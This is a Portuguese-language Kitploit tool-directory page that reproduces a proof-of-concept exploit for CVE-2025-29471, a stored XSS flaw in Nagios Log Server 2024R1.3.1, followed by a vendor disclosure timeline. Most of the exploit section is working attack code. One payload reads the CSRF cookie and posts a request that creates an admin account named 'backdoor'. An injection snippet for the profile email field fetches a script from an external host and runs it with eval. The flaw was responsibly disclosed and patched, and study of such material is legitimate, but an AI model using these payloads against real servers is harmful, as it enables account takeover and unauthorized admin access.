Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29471 — XSS armazenado no Nagios Log Server 2024R1.3.1 | Kitploit
Ferramentas/GitHubGitHub/skraft9/cve-2025-29471
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubskraft9/cve-2025-29471

CVE-2025-29471

XSS armazenado no Nagios Log Server 2024R1.3.1

Ver Repositório
13há 5 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade de XSS Armazenado no Nagios Log Server (Escalada de Privilégios para Admin)

▶️ Demonstração do PoC

Data: 2025-04-02

Autor do Exploit: Seth Kraft

Site do Fornecedor: https://www.nagios.com/

Changelog do Fornecedor: https://www.nagios.com/changelog/#log-server

Link do Software: https://assets.nagios.com/downloads/nagios-log-server/versions.php

Versões Afetadas: 2024R1.3.1 e anteriores

Testado Em: Nagios Log Server 2024R1.3.1 (configuração padrão, Ubuntu 20.04)

CWE-ID: CWE-79

Pontuação Base: 8.3 (Alta)

String do Vetor: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Tipo: Cross-Site Scripting (XSS) Armazenado, Escalada de Privilégios


Autorização

Somente para fins autorizados de teste e pesquisa. Não teste nem explore esta vulnerabilidade em sistemas que você não possua ou para os quais não tenha permissão explícita para testar.


Descrição:

Uma vulnerabilidade de XSS armazenado no Nagios Log Server 2024R1.3.1 permite que um usuário de baixo privilégio injete JavaScript malicioso no campo 'email' do seu perfil.

Quando um administrador visualiza os logs de auditoria, o payload é executado, resultando em escalada de privilégios por meio da criação não autorizada de uma conta de administrador.


Prova de Conceito

1.Hospede o payload xss.js no seu servidor externo com o seguinte conteúdo. O Github funciona bem.

Atualize <target-ip> para o IP/Hostname do alvo Nagios Log Server.

root@kitploit:~
(function() {
  console.log("🔥[XSS] Payload Executing...🔥");

  var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
  if (!csrfTokenMatch) return;
  var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
  console.log("[XSS] CSRF Token:", csrfToken);

  var requestBody = "csrf_ls=" + csrfToken +
    "&name=backdoor" +
    "&[email protected]" +
    "&username=backdoor" +
    "&password=Password123!" +
    "&password2=Password123!" +
    "&auth_type=admin" +
    "&apiaccess=1" +
    "&language=en_US" +
    "&account_type=local";

  fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: requestBody
  })
  .then(response => response.text())
  .then(function(data) {
    console.log("🔥[XSS] User Created Successfully!🔥");
    console.log(data);
  })
  .catch(console.error);
})();
  1. Faça login no Nagios Log Server como um usuário padrão (não administrador).

  2. Navegue até o endpoint de atualização de perfil:

    http://<target-ip>/nagioslogserver/profile/update

  3. Injete o seguinte payload no campo de email. Atualize a linha do fetch com a URL onde o xss.js está armazenado.

root@kitploit:~
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
  .then(response => response.text())
  .then(scriptText => eval(scriptText))
  .catch(console.error);
</script>
  1. Aguarde um administrador visualizar os logs de auditoria. O JavaScript será executado, criando uma nova conta de administrador:

Username: backdoor

Password: Password123!

  1. Faça login como backdoor com acesso total de administrador no Nagios Log Server.

Linha do Tempo da Divulgação

  • 2025-02-07: O pesquisador relatou a vulnerabilidade à Nagios
  • 2025-02-14: A Nagios confirmou o recebimento do relatório de segurança
  • 2025-03-03: O pesquisador solicitou uma atualização à Nagios
  • 2025-03-10: O pesquisador solicitou uma atualização à Nagios
  • 2025-03-17: A Nagios confirma que a vulnerabilidade foi tratada e que uma correção está planejada para ser lançada em breve
  • 2025-03-19: A Nagios lança o Nagios Log Server 2024R2
  • 2025-03-27: O pesquisador testou e verificou que o Nagios Log Server 2024R2 corrige a vulnerabilidade de XSS armazenado e informou a Nagios
  • 2025-04-01: A MITRE reserva o CVE-2025-29471 para esta vulnerabilidade de XSS armazenado, mas os detalhes permaneceram não divulgados devido à ausência de um aviso público de segurança do fornecedor
  • 2025-04-09: A Nagios lança uma atualização subsequente à correção do 2024R2 (2024R1.3.2), que aplica o backport da correção da vulnerabilidade de XSS armazenado ao branch 2024R1
  • 2025-04-15: O CVE-2025-29471 foi formalmente publicado

Aviso Legal

Este trabalho foi realizado fora do meu vínculo empregatício e reflete meus esforços pessoais em pesquisa de segurança cibernética.


Baixar ferramenta